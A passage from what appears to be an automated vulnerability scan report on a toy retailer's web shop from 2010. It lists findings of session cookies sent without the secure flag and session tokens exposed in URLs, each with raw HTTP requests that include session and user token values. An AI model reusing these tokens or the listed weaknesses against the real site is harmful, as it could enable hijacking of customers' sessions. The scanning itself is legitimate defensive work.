User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;

Response

HTTP/1.1 302 Moved Temporarily
Date: Thu, 23 Dec 2010 00:15:36 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Pragma: no-cache
Location: https://shop.mattel.com/checkout/index.jsp?process=home
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
Set-Cookie: JSESSIONID=6TpLNSJL0sSbVTJGNGF9tvc8WHGvvD4HfTGyLfTM2DLYnwBrX1SZ!-1434729825; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 305

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="https://shop.mattel.com/checkout/i
...[SNIP]...

2.6. https://shop.mattel.com/emailSignup/index.jsp  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://shop.mattel.com
Path:   /emailSignup/index.jsp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /emailSignup/index.jsp HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;

Response

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:16:04 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
Set-Cookie: JSESSIONID=z2JTNSJGhpmmnjKYH7vGhX4Xk9ZThL4KvvQmnmT1QN5WhZmWlN5h!-1434729825; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 51584


                                                                                        <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/
...[SNIP]...

2.7. https://shop.mattel.com/giftCertificates/index.jsp  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://shop.mattel.com
Path:   /giftCertificates/index.jsp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /giftCertificates/index.jsp HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;

Response

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:15:41 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Set-Cookie: JSESSIONID=mw1vNSJNFCyh5FlZyvhHzyRGSJT5vYGh8sMKRw1FzyHQMrSMrqBQ!-1434729825; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 44100


        <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


   
...[SNIP]...

2.8. https://shop.mattel.com/product/wishlist/wishlist.jsp  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://shop.mattel.com
Path:   /product/wishlist/wishlist.jsp

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /product/wishlist/wishlist.jsp HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;

Response

HTTP/1.1 302 Moved Temporarily
Date: Thu, 23 Dec 2010 00:15:39 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Location: https://shop.mattel.com/coreg/index.jsp?step=register
Set-Cookie: JSESSIONID=6BhgNSJLtGv2pTRm0wdSQBcrGXQYDXK4wBgNtqrM8p1yzPSGsSxQ!-1434729825; path=/
Set-Cookie: rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; expires=Tuesday, 10-Jan-2079 03:29:46 GMT; path=/
Content-Language: en
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 301

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="https://shop.mattel.com/coreg/inde
...[SNIP]...

2.9. https://shop.mattel.com/search/controller.jsp  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://shop.mattel.com
Path:   /search/controller.jsp

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /search/controller.jsp HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;

Response

HTTP/1.1 302 Moved Temporarily
Date: Thu, 23 Dec 2010 00:16:17 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Pragma: no-cache
Location: http://shop.mattel.com/home/index.jsp?sr=1
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
Set-Cookie: JSESSIONID=nNbLNSJRqVrxQdwRHw36YXlWtdsyz19pHJvCJ9Nvs8BXjClZGT1Q!-1434729825; path=/
Set-Cookie: rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; expires=Tuesday, 10-Jan-2079 03:30:24 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 279

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="http://shop.mattel.com/home/index.
...[SNIP]...

2.10. https://shop.mattel.com/shop/index.jsp  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://shop.mattel.com
Path:   /shop/index.jsp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /shop/index.jsp HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;

Response

HTTP/1.1 302 Moved Temporarily
Date: Thu, 23 Dec 2010 00:16:09 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Location: http://shop.mattel.com/shop/index.jsp
Set-Cookie: JSESSIONID=3TH2NSJJTJj8m1BvPfFTBxtL3MKxHh419LByYsPnhhJ5gPWKVpSR!-1434729825; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 269

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="http://shop.mattel.com/shop/index.
...[SNIP]...

2.11. https://shop.mattel.com/storeLocator/index.jsp  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://shop.mattel.com
Path:   /storeLocator/index.jsp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /storeLocator/index.jsp HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;

Response

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:16:06 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Set-Cookie: JSESSIONID=vR51NSJGT4MQyLVFJyxv053tGlfQRVQKCq4gRLT2H1XhFhRhzJRJ!-1434729825; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 41070


                                                                                        <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.o
...[SNIP]...

3. Session token in URL  previous  next
There are 6 instances of this issue:

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.


3.1. http://shop.mattel.com/category/index.jsp  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://shop.mattel.com
Path:   /category/index.jsp

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /category/index.jsp;jsessionid=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825?categoryId=3719987 HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;

Response

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:14:53 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Set-Cookie: rvdata=XR7e504f58165e4b1a5217454b585c52570f1d0545; expires=Tuesday, 10-Jan-2079 03:29:00 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 46721


                                                                                                                    <!DOCTYPE html PUBLIC "-//W3C//DTD X
...[SNIP]...

3.2. http://shop.mattel.com/family/index.jsp  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://shop.mattel.com
Path:   /family/index.jsp

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /family/index.jsp;jsessionid=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825?categoryId=3741278 HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;

Response

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:14:04 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Set-Cookie: rvdata=XR7e504f58165e4b1a5217404353535d570f1d0545; expires=Tuesday, 10-Jan-2079 03:28:11 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 99350


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


                               
...[SNIP]...
<li><a href="/family/index.jsp?page=2&amp;jsessionid=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn%21-1434729825&amp;categoryId=3741278" title="tooltip here">2</a>
...[SNIP]...
<li><a href="/family/index.jsp?page=3&amp;jsessionid=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn%21-1434729825&amp;categoryId=3741278" title="tooltip here">3</a>
...[SNIP]...
<li class="next"><a href="/family/index.jsp?page=2&amp;jsessionid=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn%21-1434729825&amp;categoryId=3741278" title="tooltip here">&#62;</a>
...[SNIP]...
<li class="viewAllButton"><a href="/family/index.jsp?view=full&amp;jsessionid=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn%21-1434729825&amp;categoryId=3741278" title="View All">View All</a>
...[SNIP]...
<li><a href="/family/index.jsp?page=2&amp;jsessionid=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn%21-1434729825&amp;categoryId=3741278" title="tooltip here">2</a>
...[SNIP]...
<li><a href="/family/index.jsp?page=3&amp;jsessionid=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn%21-1434729825&amp;categoryId=3741278" title="tooltip here">3</a>
...[SNIP]...
<li class="next"><a href="/family/index.jsp?page=2&amp;jsessionid=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn%21-1434729825&amp;categoryId=3741278" title="tooltip here">&#62;</a>
...[SNIP]...
<li class="viewAllButton"><a href="/family/index.jsp?view=full&amp;jsessionid=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn%21-1434729825&amp;categoryId=3741278" title="View All">View All</a>
...[SNIP]...

3.3. http://shop.mattel.com/family/index.jsp  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://shop.mattel.com
Path:   /family/index.jsp

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /family/index.jsp;jsessionid=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825?categoryId=3741278 HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;

Response

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:14:04 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Set-Cookie: rvdata=XR7e504f58165e4b1a5217404353535d570f1d0545; expires=Tuesday, 10-Jan-2079 03:28:11 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 99350


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


                               
...[SNIP]...

3.4. http://shop.mattel.com/helpdesk/index.jsp  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://shop.mattel.com
Path:   /helpdesk/index.jsp

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /helpdesk/index.jsp;jsessionid=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825?display=store&subdisplay=contact HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;

Response

